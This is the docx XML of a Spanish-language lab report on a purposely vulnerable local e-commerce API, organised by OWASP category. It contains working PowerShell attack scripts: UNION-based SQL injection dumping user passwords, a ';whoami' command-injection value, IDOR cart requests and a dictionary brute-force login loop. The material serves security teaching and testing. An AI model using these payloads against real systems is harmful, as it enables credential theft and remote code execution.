        <w:t xml:space="preserve">Las contraseñas de los usuarios se almacenan y se transmiten en texto plano (sin hash, sin BCrypt), y el secreto usado para firmar los JWT es una cadena débil y hardcodeada en application.properties (app.jwt.secret). Ambas fallas ya quedan evidenciadas al listar los usuarios (A01) o al analizar el token.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Ubicación en el código</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">db/schema.sql (columna password) · application.properties (app.jwt.secret) · service/AuthService.java</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint / superficie de ataque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GET /api/admin/usuarios (reutilizando el token de la sección A01)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Réplica en PowerShell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 Reutilizando $token de la sección A01: las contraseñas viajan en texto plano</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1B1B1B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>$usuarios = Invoke-RestMethod -Uri "http://127.0.0.1:8080/api/admin/usuarios" -Headers @{ Authorization = "Bearer $token" }</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1B1B1B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">$usuarios.data | Select-Object username, password, role | Format-Table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Inspeccionar el JWT: header y payload son Base64 legible, sin cifrar</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1B1B1B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">$partes = $token.Split('.')</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1B1B1B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($partes[1].PadRight(([math]::Ceiling($partes[1].Length/4))*4,'=')))</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Resultado esperado</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">La tabla de usuarios muestra las contraseñas en texto plano. El payload del JWT decodificado es legible sin necesidad de conocer el secreto, confirmando que no hay cifrado del contenido (solo firma, y con secreto débil).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
        <w:t xml:space="preserve">A05 — Injection (SQL Injection y OS Command Injection)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">ProductRepositoryJdbc construye las consultas SQL concatenando directamente el parámetro recibido del usuario (sin PreparedStatement), tanto en la búsqueda por nombre como en la búsqueda por id. Por otro lado, ReportService.pingHost() concatena el parámetro host dentro de un comando ejecutado con /bin/sh -c, permitiendo Remote Code Execution (RCE) vía encadenamiento de comandos del sistema operativo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Ubicación en el código</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">backend: repository/ProductRepositoryJdbc.java (SQLi) · service/ReportService.java (OS Command Injection)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint / superficie de ataque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GET /api/productos/buscar?q= · GET /api/admin/reportes/ping?host=</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Réplica en PowerShell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r>
              <w:t># --- SQL Injection manual (boolean-based) ---</w:t>
              <w:br/>
              <w:t>$payload = "x%') OR 1=1 -- "</w:t>
              <w:br/>
              <w:t>$encoded = [System.Uri]::EscapeDataString($payload)</w:t>
              <w:br/>
              <w:t>Invoke-RestMethod -Uri "http://127.0.0.1:8080/api/productos/buscar?q=$encoded"</w:t>
              <w:br/>
              <w:br/>
              <w:t># --- SQL Injection manual (UNION-based, 6 columnas compatibles) ---</w:t>
              <w:br/>
              <w:t>$payload = "x%') UNION SELECT id,username,password,0::numeric,0,NULL FROM usuarios -- "</w:t>
              <w:br/>
              <w:t>$encoded = [System.Uri]::EscapeDataString($payload)</w:t>
              <w:br/>
              <w:t>Invoke-RestMethod -Uri "http://127.0.0.1:8080/api/productos/buscar?q=$encoded" | ConvertTo-Json -Depth 4</w:t>
              <w:br/>
              <w:br/>
              <w:t># --- OS Command Injection / RCE controlado ---</w:t>
              <w:br/>
              <w:t>$hostPayload = [System.Uri]::EscapeDataString("127.0.0.1;whoami")</w:t>
              <w:br/>
              <w:t>Invoke-RestMethod -Uri "http://127.0.0.1:8080/api/admin/reportes/ping?host=$hostPayload"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Resultado esperado</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">El payload UNION-based devuelve, en la misma respuesta de "productos", filas con los nombres de usuario y las contraseñas de la tabla usuarios. El endpoint de ping ejecuta el comando whoami / id inyectado después del ; y devuelve su salida junto a la del ping, confirmando ejecución arbitraria de comandos en el servidor.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0392B" w:sz="6"/>
              <w:left w:val="single" w:color="C0392B" w:sz="6"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="6"/>
              <w:right w:val="single" w:color="C0392B" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:fill="F5F0E6" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Evidencia a capturar: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Captura de la respuesta JSON con las credenciales extraídas por UNION-based SQLi, y de la salida de whoami obtenida por command injection.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
        <w:t xml:space="preserve">A06 — Insecure Design</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">El carrito de compras (CartController / CartService) no valida que la cantidad solicitada sea mayor que cero ni que exista stock suficiente, y el identificador cartId se recibe como un simple parámetro de ruta sin derivarlo de una sesión autenticada y verificada, por lo que cualquiera puede leer o modificar el carrito de otra persona si conoce o adivina su cartId.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Ubicación en el código</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">backend: controller/CartController.java · service/CartService.java</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint / superficie de ataque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POST /api/carrito/{cartId}/agregar · GET /api/carrito/{cartId}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Réplica en PowerShell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 Agregar una cantidad absurda de un producto sin validación de stock</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1B1B1B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">$body = @{ productoId = 1; cantidad = 999999 } | ConvertTo-Json</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1B1B1B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Invoke-RestMethod -Uri "http://127.0.0.1:8080/api/carrito/carrito-de-otro-usuario/agregar" -Method Post -ContentType "application/json" -Body $body</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Leer el carrito ajeno simplemente adivinando/reusando su cartId</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1B1B1B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Invoke-RestMethod -Uri "http://127.0.0.1:8080/api/carrito/carrito-de-otro-usuario"</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1B1B1B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Invoke-RestMethod -Uri "http://127.0.0.1:8080/api/carrito/carrito-de-otro-usuario/total"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Resultado esperado</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">El backend acepta cantidades muy superiores al stock real sin rechazar la operación, y el carrito "carrito-de-otro-usuario" es legible y modificable por cualquier cliente sin autenticación, evidenciando la falta de un diseño seguro por defecto (fallo de diseño, no solo de implementación).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
        <w:t xml:space="preserve">A07 — Authentication Failures</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">El endpoint de login no implementa rate-limiting ni bloqueo de cuenta tras varios intentos fallidos, lo que permite un ataque de fuerza bruta / diccionario sin ninguna restricción. Además, las credenciales de cada intento de login se registran en texto plano en los logs (ver también A09).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Ubicación en el código</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">backend: controller/AuthController.login() · service/AuthService.java</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint / superficie de ataque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POST /api/auth/login</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Réplica en PowerShell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$diccionario = @("123456", "password", "admin", "admin123", "qwerty123")</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foreach ($pwd in $diccionario) {</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1B1B1B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">    $body = @{ username = "admin"; password = $pwd } | ConvertTo-Json</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1B1B1B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">    try {</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1B1B1B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">        $r = Invoke-RestMethod -Uri "http://127.0.0.1:8080/api/auth/login" -Method Post -ContentType "application/json" -Body $body</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1B1B1B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">        Write-Host "[OK] Password encontrado: $pwd" -ForegroundColor Green</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1B1B1B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">        Write-Host "Token: $($r.data.token)"</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1B1B1B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">    } catch {</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1B1B1B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">        Write-Host "[FAIL] $pwd" -ForegroundColor DarkGray</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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Resultado esperado</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Ninguno de los cinco intentos es bloqueado ni ralentizado por el backend (no hay HTTP 429 ni retardo progresivo), y el diccionario de prueba encuentra la contraseña correcta del usuario admin en pocos intentos.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
        <w:t xml:space="preserve">A08 — Software or Data Integrity Failures</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">UploadController guarda los archivos subidos usando el nombre original enviado por el cliente, sin validar el tipo MIME real ni restringir la extensión a una lista blanca. Al no sanear el nombre de archivo, también es posible un Path Traversal (../../) para escribir fuera de la carpeta de uploads prevista.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Ubicación en el código</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">backend: controller/UploadController.java</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint / superficie de ataque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POST /api/productos/{id}/imagen</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
